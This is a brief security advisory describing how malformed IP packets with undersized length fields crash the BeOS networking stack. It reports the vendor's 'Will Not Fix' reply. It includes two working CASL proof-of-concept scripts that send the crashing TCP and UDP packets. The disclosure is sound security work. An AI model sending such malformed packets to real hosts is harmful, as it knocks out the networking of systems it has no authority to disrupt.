COMMAND
kernel
SYSTEMS AFFECTED
BeOS
PROBLEM
Tim Newsham found following. The BeOS networking stack crashes
when certain malformed packets are sent to it. This document
explains two such packets. The first is an IP packet with the
protocol field set to TCP. If the IP length field is set to be
shorter than 40, it will crash the networking process on
reception. Similarly, an IP packet with protocol field set to
UDP with an IP length of less than 28 also crashes the stack.
The lengths 40 and 28 correspond with the minimum sizes of the IP
and TCP headers, and the IP and UDP headers respectively.
Because the networking stack is a seperate process in BeOS, it may
be easily restarted after it crashes.
Two CASL scripts which demonstrate the bug are listed below:
Script 1:
=========
#!/usr/local/casl/bin/casl
#include "tcpip.casl"
#include "packets.casl"
#include "tcp.casl"
srchost = 10.0.0.1;
dsthost = 10.0.0.2;
IPH = copy UDPIP;
IPH.ip_hl = 5;
IPH.ip_src = srchost;
IPH.ip_dst = dsthost;
IPH.ip_length = 27;
packet = [ IPH ];
ip_output(packet);
Script 2:
=========
#!/usr/local/casl/bin/casl
#include "tcpip.casl"
#include "packets.casl"
#include "tcp.casl"
srchost = 10.0.0.1;
dsthost = 10.0.0.2;
IPH = copy TCPIP;
IPH.ip_hl = 5;
IPH.ip_src = srchost;
IPH.ip_dst = dsthost;
IPH.ip_length = 39;
packet = [ IPH ];
ip_output(packet);
SOLUTION
A bug report has been filed with Be and assigned the bug number of
20000405-18674. Be has marked the bug as "Will Not Fix" with the
comment "The entire networking system will be replaced soon."
This bug was found with the help of the ISIC utility by Mike
Frantzen.